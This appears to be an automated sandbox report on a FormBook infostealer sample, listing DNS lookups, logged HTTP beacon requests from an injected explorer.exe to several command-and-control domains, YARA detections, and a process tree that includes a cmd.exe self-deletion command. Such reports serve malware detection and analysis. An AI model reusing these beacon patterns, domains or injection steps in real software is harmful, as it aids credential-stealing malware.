                          May 14, 2022 15:30:33.577389002 CEST8.8.8.8192.168.2.30xb05bNo error (0)www.lotsimprovements.comlotsimprovements.comCNAME (Canonical name)IN (0x0001)
                          May 14, 2022 15:30:33.577389002 CEST8.8.8.8192.168.2.30xb05bNo error (0)lotsimprovements.com209.15.40.102A (IP address)IN (0x0001)
                          May 14, 2022 15:30:39.116885900 CEST8.8.8.8192.168.2.30x5598No error (0)www.xn--hj2bz6fwvan2be1g5tb.com61.14.208.3A (IP address)IN (0x0001)
                          May 14, 2022 15:30:45.482522011 CEST8.8.8.8192.168.2.30xd859Name error (3)www.xn--ekrt15fxyb2t2c.xn--czru2dnonenoneA (IP address)IN (0x0001)
                          • www.huvao.com
                          • www.mentalnayaarifmetika.online
                          • www.chambaultfleurs.com
                          • www.hofwimmer.com
                          • www.lotsimprovements.com
                          • www.xn--hj2bz6fwvan2be1g5tb.com
                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.349760104.21.89.6180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          May 14, 2022 15:30:02.249274015 CEST8762OUTGET /ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ HTTP/1.1
                          Host: www.huvao.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          May 14, 2022 15:30:02.290631056 CEST8762INHTTP/1.1 301 Moved Permanently
                          Date: Sat, 14 May 2022 13:30:02 GMT
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: max-age=3600
                          Expires: Sat, 14 May 2022 14:30:02 GMT
                          Location: https://www.huvao.com/ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q42Dbjlfw3LlkGb9yMhX4sSv0WUglUoM4DrB%2BxG45w4YrZy%2FRAUfNe5OQ5EL2dP8Tekk8Vs22dE1kRSsb2yRyov88YvGerINKGpdDZiwAWbs6TefP2d%2BRyQutarG6uGH"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 70b3fc742e2c7198-LHR
                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.349763185.68.16.17980C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          May 14, 2022 15:30:12.699805021 CEST9366OUTGET /ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ HTTP/1.1
                          Host: www.mentalnayaarifmetika.online
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          May 14, 2022 15:30:12.743716955 CEST9368INHTTP/1.1 403 Forbidden
                          Server: nginx
                          Date: Sat, 14 May 2022 13:30:12 GMT
                          Content-Type: text/html
                          Content-Length: 1893
                          Connection: close
                          ETag: "627ea693-765"
                          x-ray: p988:0.001/wn1005:0.000/
                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 20 2d 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 34 37 34 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 62 72 69 65 66 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 63 65 6c 6c 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 34 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 35 32 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 20 20 20
                          Data Ascii: <!doctype html><html><head> <title>403 Forbidden - </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'> <style> body { background-color: #f1f4f5; color: #37474f; line-height: 1.4; font-family: 'Open Sans', sans-serif; margin: 0; padding: 0; } .error_code { display: block; font-size: 92px; font-weight: 700; margin-top: -25px; } .error_brief { display: block; font-size: 18px; font-weight: 700; margin-bottom: 15px; } </style></head><body><div style="display: table; position: absolute; height: 100%; width: 100%;"> <div style="display: table-cell; vertical-align: middle; padding: 0 40px;"> <div style="margin-left: auto; margin-right: auto; width: 520px;">


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.349764213.186.33.580C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          May 14, 2022 15:30:17.837791920 CEST9369OUTGET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT HTTP/1.1
                          Host: www.chambaultfleurs.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          May 14, 2022 15:30:17.867481947 CEST9370INHTTP/1.1 302 Moved Temporarily
                          server: nginx
                          date: Sat, 14 May 2022 13:30:16 GMT
                          content-type: text/html
                          content-length: 138
                          location: http://www.chambaultfleurs.com
                          x-iplb-request-id: 66818F37:C264_D5BA2105:0050_627FAEE9_3C99E51A:3005
                          x-iplb-instance: 16976
                          set-cookie: SERVERID77446=200174|Yn+u7|Yn+u7; path=/; HttpOnly
                          connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.349765206.189.50.6080C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          May 14, 2022 15:30:28.354022026 CEST9371OUTGET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=yHjxPQMm3JcJX2wgLRnbME7+3RpzNlr7I3qSF8qv7PZk+uQof5Nzr3YLke9JRpMCS0ME HTTP/1.1
                          Host: www.hofwimmer.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          May 14, 2022 15:30:28.396599054 CEST9372INHTTP/1.1 301 Moved Permanently
                          Age: 182
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Length: 46
                          Content-Type: text/plain
                          Date: Sat, 14 May 2022 13:27:26 GMT
                          Location: https://www.hofwimmer.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=yHjxPQMm3JcJX2wgLRnbME7+3RpzNlr7I3qSF8qv7PZk+uQof5Nzr3YLke9JRpMCS0ME
                          Server: Netlify
                          X-Nf-Request-Id: 01G31C6TMMWQDCFJXR36HGP811
                          Connection: close
                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 66 77 69 6d 6d 65 72 2e 63 6f 6d 2f 6f 63 67 72 2f
                          Data Ascii: Redirecting to https://www.hofwimmer.com/ocgr/


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          4192.168.2.349767209.15.40.10280C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          May 14, 2022 15:30:33.679238081 CEST9381OUTGET /ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ HTTP/1.1
                          Host: www.lotsimprovements.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          May 14, 2022 15:30:33.779448032 CEST9381INHTTP/1.1 301 Moved Permanently
                          Server: nginx
                          Date: Sat, 14 May 2022 13:30:33 GMT
                          Content-Type: text/html
                          Content-Length: 178
                          Connection: close
                          Location: https://www.lotsimprovements.com/ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          5192.168.2.34976861.14.208.380C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          May 14, 2022 15:30:39.400782108 CEST9383OUTGET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 HTTP/1.1
                          Host: www.xn--hj2bz6fwvan2be1g5tb.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          May 14, 2022 15:30:39.686490059 CEST9383INHTTP/1.1 200 OK
                          Date: Sat, 14 May 2022 13:25:25 GMT
                          Server: Apache/2.4.7 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=UTF-8


                          Click to jump to process

                          Target ID:1
                          Start time:15:28:36
                          Start date:14/05/2022
                          Path:C:\Users\user\Desktop\fooYgfbxno.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\fooYgfbxno.exe"
                          Imagebase:0x7f0000
                          File size:229376 bytes
                          MD5 hash:CE42FE431B88922AB59B6FD880CADCF6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Target ID:2
                          Start time:15:28:37
                          Start date:14/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          Imagebase:0xbd0000
                          File size:55400 bytes
                          MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:moderate

                          Target ID:3
                          Start time:15:28:40
                          Start date:14/05/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff6b8cf0000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          Target ID:12
                          Start time:15:29:20
                          Start date:14/05/2022
                          Path:C:\Windows\SysWOW64\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\svchost.exe
                          Imagebase:0xcb0000
                          File size:44520 bytes
                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          Target ID:13
                          Start time:15:29:22
                          Start date:14/05/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          Imagebase:0xc20000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:14
                          Start time:15:29:23
                          Start date:14/05/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7c9170000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          No disassembly